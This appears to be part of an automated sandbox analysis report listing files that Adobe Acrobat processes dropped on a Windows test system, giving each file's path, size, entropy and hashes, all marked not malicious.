SHA1: | 753E63B2A8E0EA73FBC780B85CE7C21D8E2030D1 |
SHA-256: | 299E646DC3D472723BBCB0F87B1CF954DF868A457EC4BC69F40D2B0FEF9603E3 |
SHA-512: | 2FF3F9646F1A6D831F2FFFABDBA5722FBE47E9F92C707CF931DCA80AAC3033287705152C1D5C559D83BA677281288464AA09CC6C19AE3A8413D50C2C321081A4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.163557577956955 |
Encrypted: | false |
SSDEEP: | 6:iOllMq2PN72nKuAl9OmbnIFUtHAdWZmwpGkwON72nKuAl9OmbjLJ:7nMvVaHAahFUtYW/E5OaHAaSJ |
MD5: | B75566BCD9B19B778DA2F530457C5D5D |
SHA1: | 8C46ED6428F30A24F79ECFDCD53AA1B246A33467 |
SHA-256: | CE2260C0558D51EDE1E2F5272BA4CB834E08F61CA5E3E5E6F576223B69469A84 |
SHA-512: | ECA478F4DE4701F975C23091DB2DECD54F7198777BC555B4B99F4844377711F280175D4392EF465102AAE2F0C60EC22CDE4794C96708DF11C869A0E6998C2230 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.163557577956955 |
Encrypted: | false |
SSDEEP: | 6:iOllMq2PN72nKuAl9OmbnIFUtHAdWZmwpGkwON72nKuAl9OmbjLJ:7nMvVaHAahFUtYW/E5OaHAaSJ |
MD5: | B75566BCD9B19B778DA2F530457C5D5D |
SHA1: | 8C46ED6428F30A24F79ECFDCD53AA1B246A33467 |
SHA-256: | CE2260C0558D51EDE1E2F5272BA4CB834E08F61CA5E3E5E6F576223B69469A84 |
SHA-512: | ECA478F4DE4701F975C23091DB2DECD54F7198777BC555B4B99F4844377711F280175D4392EF465102AAE2F0C60EC22CDE4794C96708DF11C869A0E6998C2230 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.101809603279736 |
Encrypted: | false |
SSDEEP: | 6:iOlCVCL+q2PN72nKuAl9Ombzo2jMGIFUtHCVUwFz1ZmwpCV5iLVkwON72nKuAl97:7ZyvVaHAa8uFUtUFZ/+iR5OaHAa8RJ |
MD5: | 2833DDABB13EAEAD1C95C6588F9BC213 |
SHA1: | E42D84BC947D2C3770E5F0163EB004DBD4C60EC8 |
SHA-256: | A068CF079469CF5FF2659CE0F8B0829184514E5456EA84A787F776BA723FBBBB |
SHA-512: | F70962D78E6C463F47AF7BF571E1371C81141D8F4B6250A749C6DB4BB5572C46A2253DD3ADB3E016B3EFB5450DF81F9A273C7F741D36BA68AFC2AC5C4AFFEE84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.101809603279736 |
Encrypted: | false |
SSDEEP: | 6:iOlCVCL+q2PN72nKuAl9Ombzo2jMGIFUtHCVUwFz1ZmwpCV5iLVkwON72nKuAl97:7ZyvVaHAa8uFUtUFZ/+iR5OaHAa8RJ |
MD5: | 2833DDABB13EAEAD1C95C6588F9BC213 |
SHA1: | E42D84BC947D2C3770E5F0163EB004DBD4C60EC8 |
SHA-256: | A068CF079469CF5FF2659CE0F8B0829184514E5456EA84A787F776BA723FBBBB |
SHA-512: | F70962D78E6C463F47AF7BF571E1371C81141D8F4B6250A749C6DB4BB5572C46A2253DD3ADB3E016B3EFB5450DF81F9A273C7F741D36BA68AFC2AC5C4AFFEE84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\19645f6f-77cc-43a5-9188-afb56a1fa211.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.974704765305813 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqtpksBdOg2HDcaq3QYiubcP7E4T3y:Y2sRdsEdMH63QYhbA7nby |
MD5: | 4CE1D0D0FA18E1D5C095BF9DD4C43B48 |
SHA1: | 96AACCC2F6E165D0FCB0B1BCF9A9E521CAB040F3 |
SHA-256: | 0A3AAC5B02FA267C25F08683A46B34B567306A8FFBC194B496F3A1763ADEB300 |
SHA-512: | C6850B875AF26A5CD9850D290A49DA50C3D5C7177F73BB7DC278F7237B5C3E8BF610E411D952E5D5FB1492D632A1E219694E91DDE82E598419546ABF1AB6D492 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.974704765305813 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqtpksBdOg2HDcaq3QYiubcP7E4T3y:Y2sRdsEdMH63QYhbA7nby |
MD5: | 4CE1D0D0FA18E1D5C095BF9DD4C43B48 |
SHA1: | 96AACCC2F6E165D0FCB0B1BCF9A9E521CAB040F3 |
SHA-256: | 0A3AAC5B02FA267C25F08683A46B34B567306A8FFBC194B496F3A1763ADEB300 |
SHA-512: | C6850B875AF26A5CD9850D290A49DA50C3D5C7177F73BB7DC278F7237B5C3E8BF610E411D952E5D5FB1492D632A1E219694E91DDE82E598419546ABF1AB6D492 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.252209465911963 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7G4YDD:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzh8 |
MD5: | BB3E519297AC02EF12ED4C59680D9C9D |
SHA1: | 6415F982FD88461AD88B279C690C70AAB9338F49 |
SHA-256: | 6D83C2493B88B71C39568A59C1A550409ADFD8360E2F970BBC6CFAAFB42F6A67 |
SHA-512: | 53E9E85FF16B95B1E81FDE2B7455E928F2325CBD8AC2045DECDBBC772A53E6C312518DB9F6C038CE8899E76E07FD91E411B6E13598C067F1FD8AEEA261D09DC3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.148915381256484 |
Encrypted: | false |
SSDEEP: | 6:iOlQFKL+q2PN72nKuAl9OmbzNMxIFUtH0Rz1ZmwpcFijLVkwON72nKuAl9OmbzNq:7SMyvVaHAa8jFUtU7/SwjR5OaHAa84J |
MD5: | 0F334CB66820CA645406B41A7E39E0EC |
SHA1: | A139AD9FB15A4E8EC48C6EDFA0C535BCE019C8C0 |
SHA-256: | 40E4D8744AC1AB64594ABD4F2154A5A26563EC96CBD559F7CB8F3D2C4C68AE89 |
SHA-512: | CD8F45984F6423868B8531D6A4586A412446D9D0754FE0802F82B07417A7C909D1A1EEBE9FB6989B671C77838D43F96BA7095269F2BDC53EA7DB6BE8D9BFC38A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.148915381256484 |
Encrypted: | false |
SSDEEP: | 6:iOlQFKL+q2PN72nKuAl9OmbzNMxIFUtH0Rz1ZmwpcFijLVkwON72nKuAl9OmbzNq:7SMyvVaHAa8jFUtU7/SwjR5OaHAa84J |
MD5: | 0F334CB66820CA645406B41A7E39E0EC |
SHA1: | A139AD9FB15A4E8EC48C6EDFA0C535BCE019C8C0 |
SHA-256: | 40E4D8744AC1AB64594ABD4F2154A5A26563EC96CBD559F7CB8F3D2C4C68AE89 |
SHA-512: | CD8F45984F6423868B8531D6A4586A412446D9D0754FE0802F82B07417A7C909D1A1EEBE9FB6989B671C77838D43F96BA7095269F2BDC53EA7DB6BE8D9BFC38A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444554544912613 |
Encrypted: | false |
SSDEEP: | 384:SeWci5tKxGI8iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:iKxGIbs3OazzU89UTTgUL |
MD5: | FB52FF607EE2F998587A69422F687D94 |
SHA1: | 382752456E3F32039DCA7D0107B4AA2A597393FC |
SHA-256: | E05FB89B5B305D900589AEB333CA6D4B5B6A3D84E33CC627999E203D3ECA0A8E |
SHA-512: | 329AB6C802D51A380F07F44E1B97AFC1E245B6F218FE4250520DC939794BD2608086766873753162880C14883058E645CA051EAAC15A6C060FD452A68E1AF7E7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.211956091663061 |
Encrypted: | false |
SSDEEP: | 24:7+taFnuwKfqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mv:7MQnCfqPmFTIF3XmHjBoGGR+jMz+Lha |
MD5: | 92116C981AE4DC52B374C3AD04357573 |
SHA1: | 3844F473C1555A6A6CC1122DB8FD0857FAD8E584 |
SHA-256: | EB90FF0A7C4E55E1F3B5081E6744392C55635DC00B3C1E10A5525B5FCCD4A4E0 |
SHA-512: | E334D503CC8D0C28608627D6E00DAC0BFC1A360068601A33B0EE381071450AA620C2409A83397DD64F33ABF20C5BE92B5E3A72A0FAAAC1CFF6649DA57149FA4E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.756362279777723 |
Encrypted: | false |
SSDEEP: | 3:kkFklq9VltfllXlE/HT8k5lhlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKzFeT8ildNMa8RdWBwRd |
MD5: | 65E60F8A094ACB3A6A08066E209E7899 |
SHA1: | A7ABA8C5E7D2FD255BC06DF1CA2F22B06E3ABE39 |
SHA-256: | 5A4AAFE8667D880E9FF5C246249AE502A3581E6955E83CB63FB4F974739C21FD |
SHA-512: | 1E3A77758B3B511E297A52281705E57A31CC5121069F23F892FD92A5656363FA32DA396264D6FA4169A5841931FBCC6A7952556A7CA932E3AFBDDC19A5219F46 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.233096791118922 |
Encrypted: | false |
SSDEEP: | 6:kKGnL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:AiDImsLNkPlE99SNxAhUe/3 |
MD5: | 75B2F69EB5D0EB01F1F847B887D100BF |
SHA1: | 17AC4AFB67B77BD09D94601056F598B07C7697A4 |
SHA-256: | C311323AC81F50FCA3B1A14AAADCC62A4A28B8C5A6F6F395DBCDD9476CF016DC |
SHA-512: | C265D8165559A95963D7BFA4B3AB3E2B6FC3940BD900797936D19DB085B6EE22F02DE9C1DD20F6792FD6F63AB91FEB3871C867414E7D1F74E3AFB9146235370F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.377392996755 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJM3g98kUwPeUkwRe9:YvXKXT5GcEGMbLUkee9 |
MD5: | 7E11D94C862E1A087E0C25D3038A4708 |
SHA1: | 5E30204EB2BC1F22932F17ADEC2BA61889142A91 |
SHA-256: | 40B12D7C0EB03E0C8F6EE46DE576794BF2808832E9E9DA4A9DFF6F32D52314DB |
SHA-512: | C4D3EE74DB1E435E8FD9B2E7759B76A1395EC46C01BF11936740354731DFB7411EF4569346ECAD892E1E2A0360288C436F608EA7221A1888F79BD17B1B3CEF99 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.330535706120579 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfBoTfXpnrPeUkwRe9:YvXKXT5GcEGWTfXcUkee9 |
MD5: | BE9DC0398588A9260DAEC1C7F3E51FA9 |
SHA1: | FA0E9C7B804E9E0FA0CB32B4870642DB85D48BC6 |
SHA-256: | A71303D383AF1AEFF31AC275905C0CA03382C377BE5226847D549BDCA5484891 |
SHA-512: | A4D36E99943362143A9632A7F18B461E80C0CA9982100F4D7814824EA93E25C4AEF20E27EFB7C24EF759AF234C677BDC15FF92C3F1B820DAD601288BDA27E8AD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.310022275257981 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfBD2G6UpnrPeUkwRe9:YvXKXT5GcEGR22cUkee9 |
MD5: | D08C5892442BBF7E9FCCA516AE28335E |
SHA1: | 99FCA48B6B240700A55EBF9421C0D49D45367F76 |
SHA-256: | D6B1200BC0279C9A1FC350FB163089D7CEB89EF583C748D2C032632A7B98B74E |
SHA-512: | 83CF005D7DD140F30F2C1AA6BCDB6C917F213A33B3599388A5A33A358F0CFAC01DD595CF79F8CB8609D506E0D824BC1672C39FEF6E51A2035E3569230DDA04C3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.357907839451841 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfPmwrPeUkwRe9:YvXKXT5GcEGH56Ukee9 |
MD5: | 2F42DA5C12ACD9713DA380CFF414E706 |
SHA1: | D5D53C60D518A1C0551B4050A102845C07EA2FBF |
SHA-256: | 1180B1D6D873274721DFEE855EB6AB16A69944B38203A39BF124D413EFACBE44 |
SHA-512: | FD4B57B9D1F25874606E33C89C189D8AEF2C5748EFA2E90026F387E0B22F9EB06D4678E06678FA9D84EDC4964C7C27FEC21F145FD618C9304CD8D6A15D940ACE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.692985201570623 |
Encrypted: | false |
SSDEEP: | 24:Yv6XZBpLgE9cQx8LennAvzBvkn0RCmK8czOCCSj:Yvuhgy6SAFv5Ah8cv/j |
MD5: | C35C30DBE6316340E21A06C929164426 |
SHA1: | CBB0B212870D2C39022E7DFDA8A26FBCFED2644E |
SHA-256: | 15771480BC1B8B52B3C8F64CE4139D6BFDEA1D3034FF4ED7D33C890946A4834D |
SHA-512: | 6BF3D66D24D68DC8A2FA913C0E92662059140CEA3407AEC708AC8EDA671D1AEC913ED29A002E2140CD5D4A2A907065689469AC75F972BABC82719737BC378EBD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.307399971205212 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJf8dPeUkwRe9:YvXKXT5GcEGU8Ukee9 |
MD5: | 66E8C521FDCCDCC320B2F831530C936B |
SHA1: | 29B249291A68D383D67FD493753B9ADC11AB887B |
SHA-256: | 01850DD390AD5D53D8467CEF7C2A40F2A7CB17A7A992F7EBBF2055E7A266220B |
SHA-512: | CBEC082FDA7AC34E02DA024172302728276F3667E8A98D87C5CA834E80F7CAC56CBBB1AFDDB29E79C1158A36C20394C03C2BE3BFD0C9603F1C44F819F7BF9E90 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.309667198865165 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfQ1rPeUkwRe9:YvXKXT5GcEGY16Ukee9 |
MD5: | 4DA7C5A3492DC6C42EDF68AB5F86BC31 |
SHA1: | F1FB1EB41083C17A696FF1F0302F2A01719301EC |
SHA-256: | 7C63DA317B1E1F2AC1B415B8778F64B66A8D287F715E1AAE11EDCEF36D5691B2 |
SHA-512: | 28EF8F03F331D6D9519CA3CC2D05A62ED5D12F63A4ED45CB7FEA684E539B69BDEC758E36977E07FA8DB4AB43B0C7BCBFE3D13BA0BED39C259BA59B8EA6949314 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.315992756393951 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfFldPeUkwRe9:YvXKXT5GcEGz8Ukee9 |
MD5: | 003D9EC542B1E38E6508E14D208E6EEF |
SHA1: | 18C1CE25AC04D52E31B17EA0E32C2533C621EB85 |
SHA-256: | C40AAB2E98333577B6A170EB34F3CE976B4BB2754966B32AC4170567374F0EC3 |
SHA-512: | 1863080363C9E8B63307CB28480CBEC47CB0B73691380B04A34882C00CC2AFEB10D14DE43222416FB2959CE86ED583D477515EBDD330DCF704798EF5BD05B627 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.333179493170713 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfzdPeUkwRe9:YvXKXT5GcEGb8Ukee9 |
MD5: | 9780D6AEF696B22F305882B0B9C146AA |
SHA1: | C4C00B6C880BF345D75549F2F4F669B91C022AFE |
SHA-256: | 4A16BBCA0A045F902DE6AEC19F83EA85F07706978F865F4FBB77D0EAA2D0FDF6 |
SHA-512: | 51DD03B3DCFB9B6E62147A62EC797CD246F43B40D1986252878E2A8D0208E6BFF47181409D88AA79C07592B88750D25F3A43D33E40E066D63CF4150913D3CCDC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.313816252588217 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfYdPeUkwRe9:YvXKXT5GcEGg8Ukee9 |
MD5: | FA0000979AF57061773A26ABDF568EFE |
SHA1: | DDDD5E3372E9C069EA63D3A3000CAA51A96FA3FC |
SHA-256: | 15EAF29E753036008081AC096D102438299B4A4E610975035DE44C6F324A5ECF |
SHA-512: | 48823348AC356644ED52996D770E77C8ED5CED3663ED03C996D06AE3F821BEA85E5F6E47DDDF4F3F81667943DE3E5BAF5515EE359E31E98B28737E3E21C8AE2C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.300408860222325 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJf+dPeUkwRe9:YvXKXT5GcEG28Ukee9 |
MD5: | A3723BEFDE0C1776AB2055651450C201 |
SHA1: | 57D896D1839799ECDC2AEBE1E04C0D069D4E9000 |
SHA-256: | CC0C02FEF9FDFAB5F7D11501025E135C9819E369E35A5AF17E354A6283969095 |
SHA-512: | F73319187C24015185DD905929B56FD11934BEC5B76F01E919F0676936B45965BC35CE47BE16F6FD3945382A661EC548206B416A0BC4109F7F2337FAA4C04176 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.297268393199617 |
Encrypted: | false |
